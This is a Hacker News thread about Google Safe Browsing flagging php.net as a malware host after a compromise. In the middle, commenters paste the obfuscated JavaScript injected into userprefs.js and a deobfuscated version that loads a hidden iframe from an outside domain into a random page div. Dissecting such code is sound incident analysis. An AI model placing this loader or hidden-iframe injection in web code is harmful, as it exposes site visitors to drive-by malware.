
Php.net detected as a malware host by Google Safe Browsing - nivla
http://www.google.com/safebrowsing/diagnostic?site=http://php.net/manual/en/function.next.php&hl=en
======
pierrefar
I work at Google and was the one who posted on our forums about this.

What our systems found was definitely a compromised JS file, and others on
this thread have posted something similar to what we saw. This is not a false
positive.

We have detailed help for webmasters in this kind of situation:

[http://www.google.com/webmasters/hacked/](http://www.google.com/webmasters/hacked/)

One thing that I strongly suggest to any webmaster in this situation is to
look for any server vulnerability that allowed this file to get compromised in
the first place. We sometimes see webmasters simply fix the affected files
without digging into security hole that allowed the hack, which leaves the
server vulnerable for repeat attacks.

Happy to answer questions.

~~~
jimbobsyourmom
You sir, get -9,001 Internets.

There are huge repercussions for any website that gets blacklisted with the
Stop Badware clearinghouse, the least of which is the inability to figure out
exactly where the problem actually is because the company you work for's
information for a webmaster to resolve the problem is ridiculously minimal.
There are no notifications (unless you are signed up for Google Webmaster
Tools) and restoring a website to normal globally can take anywhere from 48
hours to two weeks. There are millions of developers who rely on the PHP
website daily for performing their day jobs and you've now made it that much
harder for us to do our jobs.

Stop Badware needs a serious overhaul. At the very least, they should contact
the contacts in the WHOIS record for the domain BEFORE doing anything. Give
the website owners 24 hours to resolve the issue before blacklisting the site.
And give them a heck of a lot more information to go on than some vague text.

Also, there are several anti-virus vendors out there who use the clearinghouse
database for their products...6 to 12 months after the original blacklisting.
So this will happen all over again 6 to 12 months from now. Finding contacts
for anti-virus vendors for removing domain blocks is a lot harder than removal
from the blacklist on the Stop Badware site.

The CORRECT solution for this situation was to find a contact at PHP who could
resolve the issue quickly and amicably. Seriously, how hard is it to locate
Rasmus' e-mail address? Always try to find a human contact before using Stop
Badware. You can chalk using Stop Badware for the PHP website as being the
dumbest decision you've made this year. Hopefully this decision of yours will
raise the ire of the Internet just enough to force the company you work for to
revamp Stop Badware so it doesn't suck, Google Webmaster Tools so they don't
suck, and the reporting tools for sending information to Stop Badware so they
also don't suck.

~~~
Silhouette
_Stop Badware needs a serious overhaul. At the very least, they should contact
the contacts in the WHOIS record for the domain BEFORE doing anything._

Why? This isn't a responsible disclosure, "we found a potential vulnerability
but we don't know if it's being exploited yet" kind of situation. This is a
"there's a real threat to anyone visiting that site via your search engine
right now" kind of situation.

As a user, I'd be much happier if the search engine flagged this immediately.

As a site owner, if someone found malware on my site I'd want to know ASAP
too. Obviously it would be helpful if they sent me a notification and made the
specific details of the identified threat available. However, I could hardly
criticise them for blacklisting my site while it should be blacklisted, or for
claiming that we were dangerous while we were actually serving malware.

Not clearing up the blacklists promptly after the threat is identified and
removed is an entirely different question. If you're going to go around
blacklisting sites then I think you also have a responsibility (and, for that
matter, you should also have a legal obligation) to remove them from the
blacklist with similar efficiency if you're notified that the threat has been
removed. Claiming that someone's site is dangerous when it isn't is
defamatory, and should be treated as such.

------
dscrd
Everybody seems to laugh and rage about this, but could somebody tell me if
this is correctly detected or not? I would not be surprised at all if somebody
had breached php.net. Did they properly check against intrusions?

~~~
karma_fountain
It's weird. The file linked to in the google product forums
([http://static.php.net/www.php.net/userprefs.js](http://static.php.net/www.php.net/userprefs.js))
definitely has a piece of obfuscated js to insert an iframe pointing to
[http://lnkhere.reviewhdtv.co.uk/stat.htm](http://lnkhere.reviewhdtv.co.uk/stat.htm).
The actual [http://www.php.net/userprefs.js](http://www.php.net/userprefs.js)
does not though.

~~~
smsm42
It was changed to un-confuse whatever tool google is using. No version on
github has obfuscated contents (see: [https://github.com/php/web-
php/commits/master/userprefs.js](https://github.com/php/web-
php/commits/master/userprefs.js)) bit it does include another file
([https://github.com/php/web-
php/commits/master/functions.js](https://github.com/php/web-
php/commits/master/functions.js)) which did have obfuscated contents. Where
the version that inserts iframe to uk site came from?

~~~
karma_fountain
1) When I go to static userprefs.js on my mobile, no obfuscated contents.

2) Now when I browse to static userprefs.js on my desktop in incognito mode,
no obfuscated contents.

3) When i browse to static userprefs.js on normal mode I get the following js
appended:

    
    
        (function (MH) {
            var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
                     "mOO\x08J-\x0a.`iK\x00\x20(\x0b\x08)MM\x00d\x0bhKbmbb\x0bJ-\x09-`OhDf\x08)*B1*C0k\x0d,j2\x0c5+;|C\x19qSu\x1bgT`?\x0c\"1N'v\x0b-,H8"+
                     "ky6Er\x04!]\x19uVD.\x20\x15$qe\x20S>:sU\x1e:2#\x13MQ\x1c<\x20\x02)\x0eSTBlf\x05?62:`In\x17T&\x0c\"\x1e7Y\x01X@\x00/.q\x12\"\x08f#"+
                     "\x04k\x0a\x15`k.\x15rf\x0cbS\x20|x\x106CZ\x14\x18Xu1>:rXy\x0evb\x0d,q\x16\x06j\x025U\"cX\x15y|<2W~\x16\x032-T\x15\x17\\\\q\x01\x03"+
                     "\x09g\x00/.q\x12\"\x08f^\x1as$\x13f\x0e\x20i\x08Ur&H`\x1dd\x17Pt|{\x18Xu5@kn5\x14$*bx\"Yc-&}?~~2Afm\x0c\x11T\x04j`^5tRb\x0d]\x08\"]"+
                     "\x19uVD.\x20\x129wq9S\\\x1e:Qv`+lqVBhBv^?id\x20\x0dh\x11v\"*@\x1e:Rr1<\x00xx\x13&9`\x09,wPd\x0cfzWzA\x06\x1e\x1eBknW\x16B(\x06a\x00q\x02)"+
                     "\x7f*q\x19\x1f\x11v\"*@t9F`k.\x15rf\x0cb[6|\"g{S\x06m\x19\x0c6?9\x17\x14\x06j`8;\x10@Q\x1aBk\x0cUt`*\x06w4\x03\x0f~#f\x1e\x18rw\x20i\x08U"+
                     "r&H`|x\x15`!D\x18<\x11p^\x1apr<:r6\x1c\\2\x14\x1c\x18s\x18\"\x0b*Wr\"l\x02~dF\x16h<:s`\x1c\\7B\x1c\x18rC<i~U@#\x18XucDs\x14M%\x1ezp\x11:"+
                     "\x12\x1c\x18s\x144^w=x<tA!]>:u\x06\x1e:3s\x02A@\x1c\x18sC~T_\x20\x0dh\x11v\"*@!\x1eB\x1e:0px\\\x06i=nT=y6.\x14ht\x0ct.R\x1fy\x14\x19q_}"+
                     "\x0ct\x7fr=\x7fZ[@]2y\x19\x1fA\x1f2?\x1fj\x13\x19s_i\x0d[E\x1bS\x1f};V]0y\x1f&{p_?\x7f0;q\x1f9hP[\x15\x1d]jT[\x12[?^\x1f&{t_?\x19#;r\x1f"+
                     "_hW[\x14\x1dIk{ay5_ym\x1fA\x1f3?\x1f\x7f\x14\x19s_\x1bE[\x16\x1d=\x7fR[\x16[9P\x1fu}\x1fc9u\x1f=\x7f0Ypy;P\x1bQ\x1f{ay>_yy6{u_Y6\x19Q\x1f"+
                     "\x19c\x1b\x1d]y}\x12\x19\x12]\x19.*P\x1fp}yx9\x20\x19P\x1f\x1fY!\x7f5y\x1dH1{0\x7f/+\x7f>\x1fA\x1f4?\x1f\x19\x02\x19s_\x1d\x0cz\x7f!;t}]"+
                     "ydY\x16\x19\x19\x08m(\x16\x19v=\x19\x20Ysy]\x0d\x1dI\x19A[\x16[_\x0c0\x1f\x10\x19+9#\x19T\x1f\x1f*4\x7f2yi[?\x09;zo?\x0c\"1N'v\x0b-,H\x10"+
                     "\x0cui_gR&H\x10nw\x0b=fA(!T!\"\x12\x14\x0a[&'n%Pe\x04\x156$\x1bdGjgP!dx-9\x06'.\x056'\"'Rf\x1f$\x05.EtG&Zg\x7f9\x09\x7fk\x04j\x10.5\x19W"+
                     "\x16B(\x06v\x1dqq}s8^\\up\x02m_9\x17\x14\x06j`^8\x160Sq\x20+G$~~2\x15b\x01\x02m__\x7f\x176$j\x20qY=p<1f|x\x123\x20\x0dm?x-*0\x0c5I?'n3A"+
                     "{M&H\x10nwySTBlf\x1326\x03$\x13^\x1e:3txx\x15%)!fsNW$\x06m\x19\x09?P,5\x195\x14$*b\x17v\x10!\x06\x13\x1e\\Z76x<uE\x0da$1.1d`+\x1d\x0cUr&H`"+
                     "|x\x130_x<uD#^\x1au$:f\x1ezp\x11<p\x1c<\x1fWfs6\x20\x0dh\"U*a\x16+-\x0ejky\x18M(v\x0e\x17k\x1b}\x0b=\x7fA(7E?P,5\x195\x14$*b\x17f\x00\x05"+
                     "\x13\x1e|\\Z77x<u\x16sL\x06`k=j\x17T&\x0c\"\x19<\\\x09QP\x00/.B1*C0k\x0d,jI9\x1akhvNSi[?\x09;_{\x7f\x0dl3I*f\x0d5k[",
                Z7 = ["\x73\x70\x6c\x69\x74", XC = 0x09 * 17, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
                Jm = "\xd5\xb6\xf9\x89\x9eT\x1a\xe4\x9a\x87\xd3\x16r\xa4\x99}Q\x8c\xc8\xe3t\xf4\xf9\xedC",
                jS = aS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, Jm[Z7[2]]);
            UVf = function (wD) {
                var Np, uK, Ugx = uK = "",
                    DUB = 0;
                wD = wD[Z7[0]](Ugx);
                for (Np in wD) {
                    if (wD[Z7[3]](Np)) {
                        uK += pVH(wD[Np], jS[Z7[0]](Ugx)[DUB %= jS[Z7[2]]]);
                        DUB++;
                    }
                }
                return (uK);
            };
            jS = UVf(Jm);
            MH[UVf("'t!H")](UVf(aS[UVf("1w\"WtV)\x0e%")](Jm[UVf(".g.CtL")])))
        })(window, pVH = function (g6D, FFl, LyS, mnT) {
            g6D = g6D[LyS = "\x63" + (mnT = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
            return (String["\x66\x72\x6f\x6d\x43" + mnT](g6D & XC | ((g6D & (~XC & 0xff)) ^ (FFl[LyS](0) & (~XC & 0xff)))))
        });
    
    
    

4) When I control F5 the page to refresh, obfuscated contents are gone.

So I'm leaning towards it being hacked a while ago and the hacked version was
in my cache.

~~~
ingenter
This code deobfuscates basically to

    
    
            tmp3 = (tmp2 = document.createElement('iframe')).style;
            tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
            tmp1 = (tmp0 = document.createElement('div')).style;
            tmp1.width = tmp1.height = '-10000px';
            tmp1.overflow = 'hidden'; tmp1.position = 'absolute'; tmp1.left = '-10000px';
            tmp4 = document.getElementsByTagName('div');
            tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
    

Wrapped into onload.

~~~
hwh
I really love that part where a random div is selected for inserting the
iframe...

~~~
officialjunk
If there is one. Could be a little more robust :)

~~~
oneeyedpigeon
Obviously the hackers have a thing about non-semantic markup :-)

(yes, yes, I know that DIVs aren't really non-semantic - it's a joke)

------
bmfet
I'd say the tool is broken:

[http://www.google.com/safebrowsing/diagnostic?site=http://go...](http://www.google.com/safebrowsing/diagnostic?site=http://google.com)

It reports google.com for 142 exploit(s), 131 trojan(s), 98 scripting
exploit(s)

~~~
smsm42
For php.net, it reports only mere 4 trojans. So php.net is almost 100 times
safer that google.com, according to this tool. That sounds pretty good :)

~~~
camus2
> For php.net, it reports only mere 4 trojans. So php.net is almost 100 times
> safer that google.com, according to this tool. That sounds pretty good :)

Compare how many google.com pages have been tested and how much php.net pages
have been tested and stop with that non sense.

------
dpeck
There seems to be some controversy here, and one of our research systems found
the same problem. So heres a quick post and a link to the full pcap so you can
see for yourselves.

[http://barracudalabs.com/2013/10/php-net-
compromise/](http://barracudalabs.com/2013/10/php-net-compromise/)

Cheers.

~~~
JohnTHaller
Not sure if you're associated with that site, but it's kinda hard to read that
article: [http://imgur.com/lyeZ9qZ](http://imgur.com/lyeZ9qZ)

Windows, Firefox 24.0

~~~
dpeck
ugh, yeah, I'm just a bit associated with it :)

I think our social media coordinator got a little happy with the options. For
now disable JS to get a nice read, I'll see about getting that fixed.

EDIT: fixed, looks like last update of WP-Socializer introduced the bug.
Disabled for the time being. Thank you and sibling poster for pointing it out.

------
KamiNuvini
They're working on it:
[http://productforums.google.com/forum/#!topic/webmasters/puL...](http://productforums.google.com/forum/#!topic/webmasters/puLmvjtK0m8)

------
nathancahill
Interesting that satnavreviewed.co.uk, obbcountybankruptcylawyer.com,
stephaniemari.com, and northgadui.com are all owned by the same GoDaddy
account.

~~~
tobyjsullivan
Yeah, presumably the one godaddy account got hijacked, then used as a host for
the malicious file.

A good reminder that anyone's low-profile website may not seem a tempting
target, but it's still very much at risk.

------
alphadevx
This is what happens when you give too much power to one company. And what is
the appeal process? Asking for help on Twitter as the founder of a huge
project like PHP?
[https://twitter.com/rasmus/status/393258264034422785](https://twitter.com/rasmus/status/393258264034422785)

~~~
dchest
_This is what happens when you give too much power to one company._

What happens? Is it bad that that Google protects users from malware and
notifies webmasters that their website was compromised?

~~~
bowlofpetunias
Google doesn't notify anybody, you have to find out for yourself the hard way.

And after that, it forces the owners of the site to register with Google and
use Google services just to even figure out why, and to get their sites
unflagged. And that is after the owner even figured out how and where to
contact Google.

~~~
MertsA
Google sends out emails to a bunch of different addresses like
webmaster@domain.com, abuse@domain.com, etc and notifies anyone signed up
through Google Webmaster tools. The only improvement I can think of would be
if they notified whoever was listed after doing a WHOIS of the domain but
that's a little hard to automate.

>And after that, it forces the owners of the site to register with Google and
use Google services just to even figure out why, and to get their sites
unflagged.

Google forces you to prove that you own the domain before they give you any
information that they don't release publicly. How else do you suggest they go
about not releasing everything publicly? Also, all you have to do as a site
owner is click on the safe browsing diagnostic link and go from there.

~~~
david_acw
In our case the email alerts went out 12 hours after they identified our site
and started giving the warning to users. We got several calls from customers
before being notified by Google.

------
jes
Hey, PHP isn't perfect, but calling it malware seems over the top! /rimshot

Thank you, thank you, ladies and gentlemen, I'll be here all week!

~~~
topac
ba dum tss

~~~
jayzalowitz
But in all seriousness, php is not the bad guy here, bad coders are.

~~~
dscrd
Are you referring to the people who implemented PHP? Because I would be.

------
ars
A site I visit frequently was once identified as containing malware. I
overrode it and went there anyway. (In firefox.)

And now forevermore the icon for that site in the url-bar dropdown is the
warning icon, and I have not been able to find out how to change it back to
the normal one.

~~~
agilebyte
Explicitly visit the url of that favicon in the browser and hard reload the
page. That usually works for me.

~~~
ars
The icon is correct in tabs (and by correct I mean not there - the site has no
favicon), it's only incorrect in the url-drop down (the arrow in the url box
which shows you the most visited pages).

------
curiousquestion
[http://php.mirrors.pair.com/](http://php.mirrors.pair.com/)

~~~
smsm42
That's a pretty outdated mirror :)

~~~
curiousquestion
7 months in "web years" is pretty old, but as you know PHP has been around a
long time, so there's still alot of relevant information for those who depend
on the site.

------
camus2
Well somebody screwed up here. Maybe PHP core developpers should concentrate
on the security of their own website , it's more than embarrassing. There is
no reason why php.net should use anything more than a static site generator.

~~~
ds9
From the headers, php.net seems to be Apache/PHP on BSD. This might be an
example of a widespread ongoing attack pattern which is a bit of a mystery.

For the past year or more there have been compromises in this pattern -
Linux/unix platform, Apache webserver; foreign Javascript or PHP gets inserted
somehow; and/or in some cases the server binary is replaced. Sample article:
[http://arstechnica.com/security/2013/04/exclusive-ongoing-
ma...](http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-
attack-targeting-apache-hijacks-20000-sites/) \- you can find more on this.

The big question is how the original exploit happens. It may be a long-out-
there 0-day, or some admin tool that the sites have in common, or credentials
taken from compromised boxes of developers, or something else.

Edited to update info.

------
sarreph
This happened to [http://www.iphonedevsdk.com](http://www.iphonedevsdk.com) a
while ago and did a good job of tarnishing its reputation, all as a result of
an arbitrary flag.

~~~
Hoff
Serious question: this "arbitrary flag" would possibly be in reference to this
widely-reported watering hole attack[1] (or was that attack misreported?), or
are you referring to some other issue with that web site?

[1] [http://arstechnica.com/security/2013/02/dev-site-behind-
appl...](http://arstechnica.com/security/2013/02/dev-site-behind-apple-
facebook-hacks-didnt-know-it-was-booby-trapped/)

------
ma2rten
So was the site of the Thai Police with information how to get a police
clearance. Very confusing. However, it seems to fixed now.

------
LawnGnome
An update has been posted on this:
[http://php.net/archive/2013.php#id2013-10-24-1](http://php.net/archive/2013.php#id2013-10-24-1)

tl;dr: Relevant services moved to new servers; investigation continuing. Post
mortem to follow once that's done.

------
wil421
Ha I live in Cobb County I wonder if that's a good bankruptcy lawyer.

------
16s
False positives are the life of security. Microsoft Updates
(update.microsoft.com) was just blacklisted by malwaredomains this week. It
happens. Algorithms are not humans.

~~~
02
This was a true positive.

------
guard-of-terra
Malware detectors are usually right if overzealous.

------
cryptos
This relates to the website, but maybe there should be malware warnings for
programming languages too ;-)

------
maxk42
If someone managed to compromise something like the PHP binaries they could
cause a lot of damage.

~~~
smsm42
Main php.net site doesn't have binaries, only sources. windows.php.net has
Windows binaries, other sites - like Linux distros - have others.

All php releases are signed and checksummed on the d/l page.

------
jeena
Hm, so is my Firefox getting this list directly from Google or how does it
work?

~~~
dangrossman
Yes, Firefox downloads a list of suspicious sites from Google every 30
minutes. It uses the Google Safe Browsing Protocol --

[https://code.google.com/p/google-safe-
browsing/wiki/Protocol...](https://code.google.com/p/google-safe-
browsing/wiki/Protocolv2Spec)

~~~
eli
Nitpick: it's a list of _hashes_ of suspicious URLs.

------
ebarock
they should already fixed it, the file that they are mentioning, this
"userprefs.js" does it is not harmful

------
edem
Maybe they used PHP to create the site. :)

------
srajbr
whats the news from [http://php.net/](http://php.net/) webmaster???

~~~
dingdingdang
yup, can we please have some official voice provide a bit of background data
here?!

------
dlsym
Sure, there are many reasons to dislike PHP. But I wouldn't go as far and call
it a malware.

------
igl00
still funny ;)

------
finalight
if so, that means facebook is also a malware :D

~~~
camus2
facebook hardly uses the PHP interpretor,they have their own PHP VM , HHVM.

~~~
wyck
Considering the compromise was a js script and most likely had nothing to do
with PHP, both these comments are not relevant.

------
FridayWithJohn
According to Twitter post by Rasmus
([https://twitter.com/rasmus/status/393258264034422785](https://twitter.com/rasmus/status/393258264034422785))
this has been like this for at least 1 day and still has not been fixed.
Something tells me that Google has way too much power and the fact that they
don't sort out false positives in a timely fashion is really bad.

~~~
dchest
PHP webmasters didn't fix the issue and you're complaining about Google?

------
dancecodes
it is not surprised

~~~
dancecodes
why? see sources of project php.net for this site

------
okonomiyaki3000
Yeah, what gives?

------
nodesocket
Honestly, I feel like there is nerd rage here; php.net should in no way ever
be flagged as malware. Clearly a failure in Google here.

~~~
brazzy
Not sure if you're joking or lacking knowledge. Just because it's the official
PHP site does absolutey NOT mean it cannot contain malware. Legitimate sites
are compromised and used to spread malware all the damn time.

~~~
smsm42
But in this case it looks like Google tool found legit, but obfuscated file,
which was loaded in some tricky way that bad sites usually use, and decided
it's a malware.

------
bhhaskin
One reason I migrated away from php is the fact that there is simply way too
many attack vectors. Using frameworks help quite a bit, but it is to easy to
miss configure a stock php install. Not saying that is the case here though.

~~~
dkloke
you do realize that this is a javascript exploit? just sayin.

~~~
camus2
and how did the js exploit end up on their servers? through php code likely.

~~~
eksith
That's speculation. I've seen servers get compromised due to FTP problems, SSH
misconfiguration, unpatched Apache vulnerabilities, third-party stats
monitoring software with 0-days and even SQL injection.

Defacement (I consider malware injection a form of defacement) isn't unique to
PHP by a long shot.

